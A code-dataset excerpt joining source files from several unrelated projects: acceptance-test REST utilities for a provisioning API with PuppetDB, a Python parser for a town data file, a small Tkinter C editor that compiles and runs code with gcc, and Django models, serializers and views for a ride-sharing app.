NODE_PATTERN = "{url_root}/sdc/rest/vdc/{vdc_id}/chefClient/{node_name}"
METADATA_PATTERN = '{url_root}/sdc/rest/catalog/product/{product_id}'
#PuppetDB
PUPPETDB_ROOT_PATTERN = '{}://{}:{}'.format(CONFIG_PUPPETDB_PROTOCOL, CONFIG_PUPPETDB_IP, CONFIG_PUPPETDB_PORT)
PUPPETDB_NODE_PATTERN_ROOT = '{url_root}/v3/nodes'
requests.packages.urllib3.disable_warnings()
class RestUtils(object):
def __init__(self):
"""Initialization method
"""
self.api_url = SDC_SERVER
self.encoder = JSONEncoder()
def _call_api(self, pattern, method, body=None, headers=None, payload=None, **kwargs):
"""Launch HTTP request to Policy Manager API with given arguments
:param pattern: string pattern of API url with keyword arguments (format string syntax)
:param method: HTTP method to execute (string)
:param body: JSON body content (dict)
:param headers: HTTP header request (dict)
:param payload: Query parameters for the URL
:param **kwargs: URL parameters (without url_root) to fill the patters
:returns: REST API response
"""
kwargs['url_root'] = self.api_url
url = pattern.format(**kwargs)
#print "==============="
#print "### REQUEST ###"
#print 'METHOD: {}\nURL: {} \nHEADERS: {} \nBODY: {}'.format(method, url, headers, self.encoder.encode(body))
try:
if headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
r = requests.request(method=method, url=url, data=self.encoder.encode(body), headers=headers,
params=payload, verify=False)
else:
r = requests.request(method=method, url=url, data=body, headers=headers, params=payload, verify=False)
except Exception, e:
print "Request {} to {} crashed: {}".format(method, url, str(e))
return None
#print "### RESPONSE ###"
#print "HTTP RESPONSE CODE:", r.status_code
#print 'HEADERS: {} \nBODY: {}'.format(r.headers, r.content)
return r
def add_new_product(self, headers=None, body=None):
return self._call_api(pattern=PRODUCT_PATTERN_ROOT, method='post', headers=headers, body=body)
def retrieve_product(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_attributes(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_ATTRIBUTES_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_metadatas(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_METADATA_LIST_PATTERN, method='get', headers=headers, product_id=product_id)
def retrieve_product_metadata(self, product_id, metadata_key, headers=None, method='get'):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method=method, headers=headers, product_id=product_id,
metadata_key=metadata_key)
def delete_product_metadata(self, product_id, metadata_key, headers=None):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method='delete', headers=headers, product_id=product_id,
metadata_key=metadata_key)
def update_product_metadata(self, body, product_id, metadata_key, headers=None):
return self._call_api(pattern=PRODUCT_METADATA_PATTERN, method='put', headers=headers, product_id=product_id,
metadata_key=metadata_key, body=body)
def delete_product(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_PATTERN, method='delete', headers=headers, product_id=product_id)
def retrieve_product_list(self, headers=None):
return self._call_api(pattern=PRODUCT_PATTERN_ROOT, method='get', headers=headers)
def add_product_release(self, headers=None, body=None, product_id=None):
return self._call_api(pattern=PRODUCT_RELEASE_PATTERN, method='post', headers=headers, product_id=product_id,
body=body)
def delete_product_release(self, headers=None, product_id=None, version=None):
return self._call_api(pattern=VERSION_RELEASE_PATTERN, method='delete', headers=headers, product_id=product_id,
version=version)
def retrieve_product_release_information(self, headers=None, product_id=None, version=None):
return self._call_api(pattern=VERSION_RELEASE_PATTERN, method='get', headers=headers, product_id=product_id,
version=version)
def retrieve_product_release_list(self, headers=None, product_id=None):
return self._call_api(pattern=PRODUCT_RELEASE_PATTERN, method='get', headers=headers, product_id=product_id)
def install_product(self, headers=None, vdc_id=None, body=None):
return self._call_api(pattern=INSTALL_PATTERN, method='post', headers=headers, vdc_id=vdc_id, body=body)
#TODO: @deprecated
def uninstall_product(self, headers=None, product_id=None, vdc_id=None, fqn=''):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
product_id="{}_{}".format(fqn, product_id))
#TODO: @deprecated
def retrieve_list_products_installed(self, headers=None, vdc_id=None,):
return self._call_api(pattern=INSTALL_PATTERN, method='get', headers=headers, vdc_id=vdc_id)
#TODO: @deprecated
def retrieve_product_installed_information(self, headers=None, product_id=None, vdc_id=None, fqn=''):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='get', headers=headers, vdc_id=vdc_id,
product_id="{}_{}".format(fqn, product_id))
#TODO: @deprecated. Should be renamed when uninstall_product is deleted
def uninstall_product_by_product_instance_id(self, headers=None, vdc_id=None, product_instance_id=None):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
product_id=product_instance_id)
def retrieve_task(self, headers=None, vdc_id=None, task_id=None):
return self._call_api(pattern=TASK_PATTERN, method='get', headers=headers, vdc_id=vdc_id, task_id=task_id)
def retrieve_product_instance_list(self, headers=None, vdc_id=None):
return self._call_api(pattern=INSTALL_PATTERN, method='get', headers=headers, vdc_id=vdc_id)
def retrieve_product_instance(self, headers=None, vdc_id=None, product_instance_id=None):
return self._call_api(pattern=PRODUCT_INSTALLED_PATTERN, method='get', headers=headers, vdc_id=vdc_id,
product_id=product_instance_id)
def retrieve_productandrelease_list(self, headers=None):
return self._call_api(pattern=PRODUCTANDRELEASE_PATTERN_ROOT, method='get', headers=headers)
def request_productandrelease(self, headers=None, method=None):
return self._call_api(pattern=PRODUCTANDRELEASE_PATTERN_ROOT, method=method, headers=headers)
def retrieve_node_list(self, headers, vdc_id):
return self._call_api(pattern=NODE_PATTERN_ROOT, method='get', headers=headers, vdc_id=vdc_id)
def delete_node(self, headers, vdc_id, node_name):
return self._call_api(pattern=NODE_PATTERN, method='delete', headers=headers, vdc_id=vdc_id,
node_name=node_name)
def retrieve_puppetdb_node_list(self):
"""
This method gets the list of registered nodes from PuppetDB
:return: REST API response (Requests lib)
"""
url = PUPPETDB_NODE_PATTERN_ROOT.format(url_root=PUPPETDB_ROOT_PATTERN)
return requests.request(method='get', url=url, verify=False)
@staticmethod
def call_url_task(method=None, headers=None, url=None):
try:
r = requests.request(method=method, url=url, headers=headers)
except Exception, e:
print "Request {} to {} crashed: {}".format(method, url, str(e))
return None
return r
def _uninstall_product_if_installed(self, product, headers):
if product[STATUS] == TASK_STATUS_VALUE_INSTALLED:
response = self.uninstall_product_by_product_instance_id(headers=headers,
vdc_id=headers[TENANT_ID_HEADER],
product_instance_id=product[PRODUCT_NAME])
assert response.ok
def uninstall_all_products(self, headers=None):
response = self.retrieve_product_instance_list(headers, headers[TENANT_ID_HEADER])
products_installed_body = response.json()
if not isinstance(products_installed_body, list):
self._uninstall_product_if_installed(products_installed_body, headers)
else:
for product in products_installed_body:
self._uninstall_product_if_installed(product, headers)
def delete_all_testing_products(self, headers=None):
response = self.retrieve_product_list(headers=headers)
assert response.ok
try:
product_list = response.json()
except:
assert response.content == 'null'
return
if not isinstance(product_list, list):
if ('testing' in product_list[PRODUCT_NAME] or 'qa-test' in product_list[PRODUCT_NAME]) \
and 'testing_prov_' not in product_list[PRODUCT_NAME]:
delete_response = self.delete_product(headers=headers, product_id=product_list[PRODUCT_NAME])
if not delete_response.ok:
release_list = self.retrieve_product_release_list(headers=headers,
product_id=product_list[PRODUCT_NAME])
release_list = release_list.json()
print "RELEASE LIST: {}".format(release_list)
delete_release = self.delete_product_release(headers=headers, product_id=product_list[PRODUCT_NAME],
version=release_list[VERSION])
#assert delete_release.ok
delete_response = self.delete_product(headers=headers, product_id=product_list[PRODUCT_NAME])
#assert delete_response.ok
else:
for product in product_list:
if ('testing' in product[PRODUCT_NAME] or 'qa-test' in product[PRODUCT_NAME]) \
and 'testing_prov_' not in product[PRODUCT_NAME]:
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
if not delete_response.ok:
release_list = self.retrieve_product_release_list(headers=headers,
product_id=product[PRODUCT_NAME])
release_list = release_list.json()
if not isinstance(release_list, list):
delete_release = self.delete_product_release(headers=headers,
product_id=product[PRODUCT_NAME],
version=release_list[VERSION])
#assert delete_release.ok, delete_release.content
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
#assert delete_response.ok
else:
for release in release_list:
delete_release = self.delete_product_release(headers=headers,
product_id=product[PRODUCT_NAME],
version=release[VERSION])
#assert delete_release.ok, delete_release.content
delete_response = self.delete_product(headers=headers, product_id=product[PRODUCT_NAME])
#assert delete_response.ok
```
#### File: acceptance/commons/utils.py
```python
__author__ = 'arobres, jfernandez'
import xmldict
import xmltodict
import string
import random
import time
from commons.rest_utils import RestUtils
from constants import *
from lxml import etree
from commons.fabric_utils import execute_file_exist
from configuration import WAIT_FOR_OPERATION, WAIT_FOR_INSTALLATION
def __set_none_as_empty_value__(python_dict_element):
""" Replace all None values of a dict by an empty value ""
:param python_dict_element: Dict to be analyzed. Will be replaced itself.
:return: None
"""
for element in python_dict_element:
if python_dict_element[element] is None:
python_dict_element.update({element: ''})
elif isinstance(element, dict):
__set_none_as_empty_value__(element)
def dict_to_xml(dict_to_convert):
return xmldict.dict_to_xml(dict_to_convert)
def xml_to_dict(xml_to_convert):
return xmldict.xml_to_dict(xml_to_convert)
def xml_to_dict_attr(xml_to_convert):
return xmltodict.parse(xml_to_convert, attr_prefix='')
def response_body_to_dict(http_response, accept_content_type, with_attributes=False, xml_root_element_name=None,
is_list=False):
"""
Method to convert a XML o JSON response in a Python dict
:param http_response: 'Requests (lib)' response
:param accept_content_type: Accept header value
:param with_attributes: For XML requests. If True, XML attributes will be processed
:param xml_root_element_name: For XML requests. XML root element in response.
:param is_list: For XML requests. If response is a list, a True value will delete list node name
:return: Python dict with response.
"""
if ACCEPT_HEADER_JSON in accept_content_type:
try:
return http_response.json()
except Exception, e:
print str(e)
else:
if with_attributes is True:
return xml_to_dict_attr(http_response.content)[xml_root_element_name]
else:
assert xml_root_element_name is not None,\
"xml_root_element_name is a mandatory param when body is in XML and attributes are not considered"
response_body = xml_to_dict(http_response.content)[xml_root_element_name]
if response_body is not None:
__set_none_as_empty_value__(response_body)
if is_list and response_body is not None:
response_body = response_body.popitem()[1]
return response_body
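# Minimal usage sketch (the root element name below is illustrative, not taken from this suite):
# response = RestUtils().retrieve_product_list(headers=headers)
# body = response_body_to_dict(response, headers[ACCEPT_HEADER],
#                              xml_root_element_name='products', is_list=True)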
def body_model_to_body_request(body_model, content_type, body_model_root_element=None):
if CONTENT_TYPE_XML in content_type:
return dict_to_xml(body_model)
else:
return body_model[body_model_root_element]
def set_default_headers(token_id, tenant_id):
headers = dict()
headers[AUTH_TOKEN_HEADER] = token_id
headers[TENANT_ID_HEADER] = tenant_id
headers[CONTENT_TYPE] = CONTENT_TYPE_XML
headers[ACCEPT_HEADER] = CONTENT_TYPE_JSON
return headers
def id_generator(size=10, chars=string.ascii_letters + string.digits):
    """Method to create random ids
    :param size: define the string size
    :param chars: the characters to be used to create the string
    """
    return ''.join(random.choice(chars) for x in range(size))
def delete_keys_from_dict(dict_del, key):
"""
Method to delete keys from python dict
:param dict_del: Python dictionary with all keys
:param key: key to be deleted in the Python dictionary
    :returns a new Python dictionary without the deleted keys
"""
if key in dict_del.keys():
del dict_del[key]
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, key)
return dict_del
def delete_keys_when_value_is_none(dict_del):
default_dict = dict_del.copy()
for v in default_dict.keys():
if default_dict[v] is None:
del dict_del[v]
return dict_del
def replace_none_value_metadata_to_empty_string(list_of_metadatas):
"""
In a metadata list, replace None value by empty string
:param list_of_metadatas:
:return:
"""
for metadata in list_of_metadatas:
if metadata['value'] is None:
metadata['value'] = ''
def wait_for_task_finished(vdc_id, task_id, seconds=WAIT_FOR_OPERATION, status_to_be_finished=None, headers=None):
rest_utils = RestUtils()
correct_status = False
for count in range(seconds):
response = rest_utils.retrieve_task(headers=headers, vdc_id=vdc_id, task_id=task_id)
response_body = response_body_to_dict(response, headers[ACCEPT_HEADER], with_attributes=True,
xml_root_element_name=TASK)
status = response_body[TASK_STATUS]
print '[TASK] Waiting for task status. CHECK: {} - STATUS: {}'.format(count, status)
if status == status_to_be_finished:
correct_status = True
break
elif status != TASK_STATUS_VALUE_RUNNING:
break
time.sleep(5)
if correct_status is False:
print "[TASK] Response body:", response_body
return correct_status
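# Usage sketch (constants come from the wildcard import of constants.py above; the task id is
# assumed to come from a previous install request):
# finished = wait_for_task_finished(vdc_id=headers[TENANT_ID_HEADER], task_id=task_id,
#                                   status_to_be_finished=TASK_STATUS_VALUE_INSTALLED,
#                                   headers=headers)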
def wait_for_software_installed(seconds=WAIT_FOR_INSTALLATION, status_to_be_finished=True, file_name=None):
for count in range(seconds/3):
response = execute_file_exist(test_file_name=file_name)
print "Waiting for file status. FILE EXISTS: {}".format(response)
if status_to_be_finished == response:
return True
time.sleep(3)
return False
#@deprecated [utils.response_body_to_dict]
def convert_response_to_json(response):
response_headers = response.headers
if response_headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
try:
response_body = response.json()
except Exception, e:
print str(e)
else:
response_body = xml_to_dict(response.content)
return response_body
def get_installation_response(response):
response_headers = response.headers
if response_headers[CONTENT_TYPE] == CONTENT_TYPE_JSON:
try:
response_body = response.json()
status = response_body[STATUS_XML]
href = response_body[TASK_URL]
vdc = response_body[VDC]
except Exception, e:
print str(e)
else:
try:
response_xml = etree.XML(response.content)
href = response_xml.xpath("//task/@href")[0]
status = response_xml.xpath("//task/@status")[0]
vdc = response_xml.xpath("//task/vdc")[0].text
except Exception, e:
print str(e)
return href, status, vdc
def generate_product_instance_id(vm_fqn, product_name, product_version):
"""
Method to generate instance id for installed products (product instances)
:param vm_fqn: FQN (where product has been installed)
:param product_name: Product name (instance)
:param product_version: Product release (instance)
:return: Product instance ID
"""
return "{}_{}_{}".format(vm_fqn, product_name, product_version)
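# For example, with illustrative values, generate_product_instance_id('qa-vm-01', 'tomcat', '7.0')
# returns 'qa-vm-01_tomcat_7.0'.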
def _replace_ipall_att_value(attribute, installator):
"""
If installator is Puppet, list of values (IPALL type) is installed by our testing manifest without ",".
This method return the list without that character to validate a successful installation
:param attribute: Instance attribute to be processed
:return: If installator is Puppet, list of values when attribute type is IPALL will be processed
to delete the "," character
"""
if installator == 'puppet' and ATTRIBUTE_TYPE in attribute and attribute[ATTRIBUTE_TYPE] == ATTRIBUTE_TYPE_IPALL:
return attribute[VALUE].replace(",", "")
else:
return attribute[VALUE]
def generate_content_installed_by_product(product_name, product_version, instance_attributes, installator='chef'):
att_01 = PRODUCT_INSTALLATION_ATT1_DEFAULT
att_02 = PRODUCT_INSTALLATION_ATT2_DEFAULT
    if instance_attributes is not None and len(instance_attributes) != 0:
if len(instance_attributes) >= 1:
att_01 = _replace_ipall_att_value(instance_attributes[0], installator)
if len(instance_attributes) >= 2:
att_02 = _replace_ipall_att_value(instance_attributes[1], installator)
return PRODUCT_INSTALLATION_FILE_CONTENT.format(product_name=product_name, product_version=product_version,
att_01=att_01, att_02=att_02)
```
#### File: uninstall_product/feature/terrain.py
```python
__author__ = 'jfernandez'
from lettuce import world, before, after
from commons.terrain_steps import setup_feature, setup_scenario, setup_outline, tear_down
from commons.provisioning_steps import ProvisioningSteps
from commons.rest_utils import RestUtils
from commons.configuration import CONFIG_VM_HOSTNAME
from commons.fabric_utils import execute_chef_client, execute_puppet_agent, remove_chef_client_cert_file, \
execute_chef_client_stop, execute_puppet_agent_stop, remove_puppet_agent_cert_file, remove_all_generated_test_files, \
remove_puppet_agent_catalog
provisioning_steps = ProvisioningSteps()
rest_utils = RestUtils()
@before.each_feature
def before_each_feature(feature):
"""
Hook: Will be executed before each feature. Configures global vars and gets token from keystone.
Launch agents (puppet and chef) in the target VM
"""
setup_feature(feature)
@before.each_scenario
def before_each_scenario(scenario):
"""
Hook: Will be executed before each Scenario.
Setup Scenario: initialize World vars and launch agents (puppet and chef) in the target VM
"""
setup_scenario(scenario)
execute_chef_client()
execute_puppet_agent()
@before.outline
def before_outline(param1, param2, param3, param4):
""" Hook: Will be executed before each Scenario Outline. Same behaviour as 'before_each_scenario'"""
setup_outline(param1, param2, param3, param4)
remove_all_generated_test_files()
remove_puppet_agent_catalog()
@after.each_scenario
def after_each_scenario(scenario):
"""
    Hook: Will be executed after each scenario
Removes Feature data and cleans the system. Kills all agents running in the VM.
"""
execute_chef_client_stop()
execute_puppet_agent_stop()
remove_chef_client_cert_file()
remove_puppet_agent_cert_file()
remove_all_generated_test_files()
remove_puppet_agent_catalog()
rest_utils.delete_node(world.headers, world.tenant_id, CONFIG_VM_HOSTNAME)
@after.all
def after_all(scenario):
"""
    Hook: Will be executed once, after all scenarios
Removes Feature data and cleans the system. Kills all agents running in the VM.
"""
after_each_scenario(scenario)
tear_down(scenario)
```
|
{
"source": "JesusProfile/colloquium",
"score": 3
}
|
#### File: colloquium/InfotecsPython/toTestTxt.py
```python
import re # for regulars
# Same class lies in script.py
class workerTxt:
def __init__(self, filename):
self.filename = filename
def get_town_by_id(self, id):
file = open(self.filename)
for line in file:
if(line.startswith(str(id)+'\t')):
return line.replace(str(id)+'\t', '')
return "No such town"
def get_n_towns_from(self, id, count):
file = open(self.filename)
towns = []
n = 0
start_count = False
for line in file:
if(line.startswith(str(id)+'\t')):
start_count = True
if(start_count):
if(n == count):
return towns
towns.append(re.sub(r'^\d*\t','',line))
n += 1
if(not start_count):
return "No such town"
file = open(self.filename)
for line in file:
if (n == count):
return towns
towns.append(re.sub(r'^\d*\t','',line))
n += 1
def get_n_towns(self, count):
file = open(self.filename)
towns = []
for i in range(count):
towns.append(re.sub(r'^\d*\t','',file.readline()))
return towns
def get_norther_town(self, first, second):
file = open(self.filename)
        first_pretenders = []  # candidates to be the first town
        second_pretenders = []  # candidates to be the second town
for line in file:
info = line.split('\t')
search = re.search("," + first + r"$", info[3])
            if(search):  # whether the first town is listed among the town's alternative names
first_pretenders.append(info)
search = re.search("," + second + r"$", info[3])
if(search):
second_pretenders.append((info))
if(not first_pretenders and not second_pretenders):
return "No such towns"
if(not first_pretenders):
return "No such first town"
if(not second_pretenders):
return "No such second town"
if(len(first_pretenders)>1):
nice_pretender = first_pretenders[0]
            for pretender in first_pretenders:  # consider each candidate
                if(float(pretender[14] or 0) > float(nice_pretender[14] or 0)):
nice_pretender = pretender
first_pretenders = [nice_pretender]
if(len(second_pretenders)>1):
nice_pretender = second_pretenders[0]
            for pretender in second_pretenders:  # consider each candidate
                if (float(pretender[14] or 0) > float(nice_pretender[14] or 0)):
nice_pretender = pretender
second_pretenders = [nice_pretender]
        if(float(first_pretenders[0][4]) >= float(second_pretenders[0][4])):
            town1 = "\t".join(first_pretenders[0][1:])
            town2 = "\t".join(second_pretenders[0][1:])
        if(float(second_pretenders[0][4]) > float(first_pretenders[0][4])):
            town1 = "\t".join(second_pretenders[0][1:])
            town2 = "\t".join(first_pretenders[0][1:])
        difference = "No time difference" if first_pretenders[0][-2] == second_pretenders[0][-2] else "There is a time difference"
towns = {"north":town1,"south":town2,"difference":difference}
return towns
# TESTS
if(__name__ == "__main__"):
worker = workerTxt("RU.txt")
# print("No such town (id == 1):\n", worker.get_town_by_id(1))
# print("Return town:\n", worker.get_town_by_id(451748))
test = worker.get_n_towns_from(451747,50)
print("Return 50 towns:\n", test)
test = worker.get_n_towns_from(12110389,50)
print(f"Return 50 towns after end of file:\n Length == {len(test)}\n", test[0],test[49])
print("No such town (id == 1):\n", worker.get_n_towns_from(1,50))
# print("Return 50 towns from start:\n", worker.get_n_towns(50))
# print("No such towns:\n", worker.get_norther_town("asd","asdsf"))
# print("Return norther town, no difference:\n", worker.get_norther_town("Посёлок Логи","<NAME>"))
# print("Return norther town, there is difference:\n", worker.get_norther_town("Урочище Салокачи", "<NAME>"))
```
|
{
"source": "jesusrafaelchris/Arduino-IDE-in-C",
"score": 3
}
|
#### File: jesusrafaelchris/Arduino-IDE-in-C/C_IDE.py
```python
from tkinter import *
import subprocess
import os
import sys
from tkinter.filedialog import asksaveasfile
import os.path
import time
# Some code here
filename = []
root = Tk()
root.geometry("500x500")
root.title("C IDE")
root.minsize(350, 350)
def redirector(inputStr):
STDOutput.configure(state="normal")
STDOutput.insert(INSERT, inputStr)
STDOutput.configure(state="disabled")
def deleteText():
STDOutput.configure(state="normal")
STDOutput.delete('1.0', END)
STDOutput.configure(state="disabled")
def updatefile():
with open(filename[0],'w') as text:
text.write(inputtxt.get("1.0", "end-1c"))
def save():
if not filename:
files = [('C Files', '*.c')]
f = asksaveasfile(mode='w', defaultextension=".c")
if f is None: # asksaveasfile return `None` if dialog closed with "cancel".
return
text2save = inputtxt.get("1.0", "end-1c") # starts from `1.0`, not `0.0`
f.write(text2save)
filename.clear()
filename.insert(0,str(f.name))
f.close()
else:
updatefile()
def savefile():
if not filename:
save()
else:
updatefile()
def run():
savefile()
deleteText()
os.system("gcc -o out " + filename[0])
process = subprocess.Popen(['./out'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
#stdout_data,stderr_data = process.communicate()
#errcode = process.returncode
output = process.stdout.read()
error = process.stderr.read()
print(output)
print(error)
#Output.insert(END,str(out))
process.kill()
process.terminate()
menubar = Menu(root)
filemenu = Menu(menubar, tearoff=0)
#filemenu.add_command(label="New", command=donothing)
#filemenu.add_command(label="Open", command=donothing)
filemenu.add_command(label="Save", command=lambda : save())
root.bind('<Command-s>', lambda event: save())
root.bind('<Control-s>', lambda event: save())
filemenu.add_command(label="Run", command=lambda : run())
root.bind('<Command-r>', lambda event: run())
root.bind('<Control-r>', lambda event: run())
filemenu.add_separator()
filemenu.add_command(label="Exit", command=root.quit)
menubar.add_cascade(label="File", menu=filemenu)
#helpmenu = Menu(menubar, tearoff=0)
#helpmenu.add_command(label="Help Index", command=donothing)
#helpmenu.add_command(label="About...", command=donothing)
#menubar.add_cascade(label="Help", menu=helpmenu)
root.config(menu=menubar)
l = Label(text = "Write your code")
inputtxt = Text(root, height = 20,
width = 110,
bg = "white")
STDOutput = Text(root, height = 10,
width = 25,
bg = "black",
fg = "orange")
startcode = """#include <stdio.h>
#include <stdlib.h>
int main(void) {
}
"""
#l.pack(fill=BOTH, expand=1)
inputtxt.pack(fill=BOTH, expand=1)
STDOutput.pack(fill=BOTH, expand=1, side = LEFT)
inputtxt.insert('1.0', startcode)
sys.stdout.write = redirector
mainloop()
```
|
{
"source": "jesusRL96/curso_platzi_django_adv",
"score": 2
}
|
#### File: circles/models/circles.py
```python
from django.db import models
from cride.utils.models import CRideModel
class Circle(CRideModel):
"""Cirle model
private group"""
name = models.CharField('circle name', max_length=140)
slug_name = models.SlugField('slug name', max_length=140, unique=True)
about = models.CharField('circle description', max_length=255)
picture = models.ImageField('circle picture', upload_to='circles/pictures/', blank=True, null=True)
# stats
rides_offered = models.PositiveIntegerField(default=0)
rides_taken = models.PositiveIntegerField(default=0)
    verified = models.BooleanField('verified circle', default=False, help_text="verified circles are official communities")
is_public = models.BooleanField(default=False, help_text="public circle")
is_limited = models.BooleanField(default=False, help_text="limited circles")
limit = models.PositiveIntegerField(default=0, help_text="limit")
members = models.ManyToManyField('users.User', through='circles.Membership', through_fields=('circle', 'user'))
def __str__(self):
return self.name
class Meta(CRideModel.Meta):
"""Class meta"""
ordering = ['-rides_taken', '-rides_offered']
```
#### File: circles/models/memberships.py
```python
from django.db import models
from cride.utils.models import CRideModel
class Membership(CRideModel):
"""Membership model
    a membership is a table that holds the relationship
between a circle and a user"""
user = models.ForeignKey('users.User', on_delete=models.CASCADE)
profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
circle = models.ForeignKey('circles.Circle', on_delete=models.CASCADE)
is_admin = models.BooleanField(
default=False,
help_text="Circle admins can update the circle's data and manage its members."
)
# Invitations
invited_by = models.ForeignKey('users.User', on_delete=models.SET_NULL, null=True, related_name='invited_by')
userd_invitations = models.PositiveSmallIntegerField(default=0)
remaining_invitations = models.PositiveSmallIntegerField(default=0)
# stats
rides_taken = models.PositiveIntegerField(default=0)
rides_offered = models.PositiveIntegerField(default=0)
is_active = models.BooleanField(
default=True,
        help_text="Only active users can interact in the circle."
)
def __str__(self):
return f'@{self.user.username} at #{self.circle.slug_name}'
class Meta(CRideModel.Meta):
"""Class meta"""
ordering = ['-rides_taken', '-rides_offered']
```
#### File: circles/views/circles.py
```python
from rest_framework import viewsets, mixins
# Permissions
from cride.circles.permissions.circles import IsCircleAdmin
from rest_framework.permissions import IsAuthenticated
from cride.circles.serializers import CircleModelSerializer
from cride.circles.models import Circle, Membership
# Filters
from rest_framework.filters import SearchFilter, OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
class CircleViewSet(mixins.CreateModelMixin,
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.ListModelMixin,
viewsets.GenericViewSet):
"""Circle viewset"""
serializer_class = CircleModelSerializer
permission_classes = (IsAuthenticated,)
lookup_field = 'slug_name'
filter_backends = (SearchFilter, OrderingFilter, DjangoFilterBackend)
search_fields = ("slug_name", "name")
ordering_fields = ("rides_taken", "rides_offered", "name", "created")
ordering = ('-members', 'rides_offered', 'rides_taken')
filter_fields = ('verified', 'is_limited')
def get_queryset(self):
queryset = Circle.objects.all()
if self.action == 'list':
queryset = Circle.objects.filter(is_public=True)
return queryset
def get_permissions(self):
permissions = [IsAuthenticated]
if self.action in ['update', 'partial_update']:
permissions.append(IsCircleAdmin)
return [p() for p in permissions]
def perform_create(self, serializer):
"""Assign circle admin"""
circle = serializer.save()
user = self.request.user
profile = user.profile
Membership.objects.create(
user = user,
profile = profile,
circle = circle,
is_admin = True,
remaining_invitations = 10
)
```
#### File: rides/serializers/rides.py
```python
from rest_framework import serializers
from cride.users.serializers import UserModelSerializer
from cride.rides.models import Ride
from cride.users.models import User
from cride.circles.models import Membership
from datetime import timedelta
from django.utils import timezone
class CreateRideSerializer(serializers.ModelSerializer):
offered_by = serializers.HiddenField(default=serializers.CurrentUserDefault())
available_seats = serializers.IntegerField(min_value=1, max_value=15)
class Meta:
"""Meta class"""
model = Ride
exclude = ("passengers", "rating", "is_active", "offered_in")
    def validate_departure_date(self, data):
        """Verify the date is not in the past"""
        min_date = timezone.now() - timedelta(minutes=15)
        if data < min_date:
            raise serializers.ValidationError('Departure time must be at least passing the next 20 minutes window.')
        return data
def validate(self, data):
user = data['offered_by']
circle = self.context['circle']
if self.context['request'].user != user:
raise serializers.ValidationError('Rides offered on behalf of others are not allowed.')
try:
membership = Membership.objects.get(user=user, circle=circle, is_active=True)
except Membership.DoesNotExist:
raise serializers.ValidationError('User is not an active member of the circle.')
if data['arrival_date'] <= data['departure_date']:
            raise serializers.ValidationError('Arrival date must happen after the departure date.')
self.context['membership'] = membership
return data
def create(self, data):
circle = self.context['circle']
ride = Ride.objects.create(**data, offered_in=circle)
# Circle
circle.rides_offered += 1
circle.save()
# Membership
membership = self.context['membership']
membership.rides_offered += 1
membership.save()
# profile
profile = data['offered_by'].profile
profile.rides_offered += 1
profile.save()
return ride
class JoinRideSerializer(serializers.ModelSerializer):
passenger = serializers.IntegerField()
class Meta:
"""Meta class"""
model = Ride
fields = ("passenger",)
def validate_passenger(self, data):
try:
user = User.objects.get(pk=data)
except User.DoesNotExist:
raise serializers.ValidationError('Invalid passenger.')
circle = self.context['circle']
try:
member = Membership.objects.get(user=user, circle=circle, is_active=True)
except Membership.DoesNotExist:
raise serializers.ValidationError('User is not an active member of the circle.')
self.context['user'] = user
self.context['member'] = member
return data
def validate(self, data):
offset = timezone.now() - timedelta(minutes=15)
ride = self.context['ride']
if ride.departure_date <= offset:
raise serializers.ValidationError("You can't join this ride now.")
if ride.available_seats < 1:
raise serializers.ValidationError("Ride is already full.")
if ride.passengers.filter(pk=data['passenger']).exists():
raise serializers.ValidationError("Passenger is already in this ride.")
return data
def update(self, instance, data):
ride = instance
user = self.context['user']
circle = self.context['circle']
ride.passengers.add(user)
profile = user.profile
profile.rides_taken += 1
profile.save()
member = self.context['member']
member.rides_taken += 1
member.save()
circle.rides_taken += 1
circle.save()
return ride
class EndRideSerializer(serializers.ModelSerializer):
current_time = serializers.DateTimeField()
class Meta:
"""Meta class"""
model = Ride
fields = ("is_active", "current_time")
def validate_current_time(self, data):
ride = self.context['view'].get_object()
if data <= ride.departure_date:
raise serializers.ValidationError('Ride has not started yet')
return data
class RideModelSerializer(serializers.ModelSerializer):
offered_by = UserModelSerializer(read_only=True)
offered_in = serializers.StringRelatedField(read_only=True)
passengers = UserModelSerializer(read_only=True, many=True)
class Meta:
model = Ride
fields = "__all__"
read_only_fields = ('offered_by', 'offered_in', 'rating')
def update(self, instance, validated_data):
now = timezone.now()
if instance.departure_date <= now:
raise serializers.ValidationError('Ongoing rides can not be modified.')
return super(RideModelSerializer, self).update(instance, validated_data)
```
#### File: rides/views/rides.py
```python
from datetime import timedelta
from django.utils import timezone
from cride.rides import serializers
from rest_framework import mixins, viewsets, status
from rest_framework.response import Response
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from cride.rides.serializers import CreateRideSerializer, RideModelSerializer, JoinRideSerializer, EndRideSerializer, CreateRideRatingSerializer
from cride.circles.models import Circle
from rest_framework.permissions import IsAuthenticated
from cride.circles.permissions.memberships import IsActiveCircleMember
from cride.rides.permissions.rides import IsRideOwner, IsNotRideOwner
# Filters
from rest_framework.filters import SearchFilter, OrderingFilter
class RideViewSet(mixins.CreateModelMixin, mixins.ListModelMixin,mixins.UpdateModelMixin,mixins.RetrieveModelMixin, viewsets.GenericViewSet):
"""Ride User"""
permission_classes = (IsAuthenticated, IsActiveCircleMember)
filter_backends = (SearchFilter, OrderingFilter)
search_fields = ("departure_location", "arrival_location")
ordering_fields = ("departure_date", "arrival_date", "available_seats",)
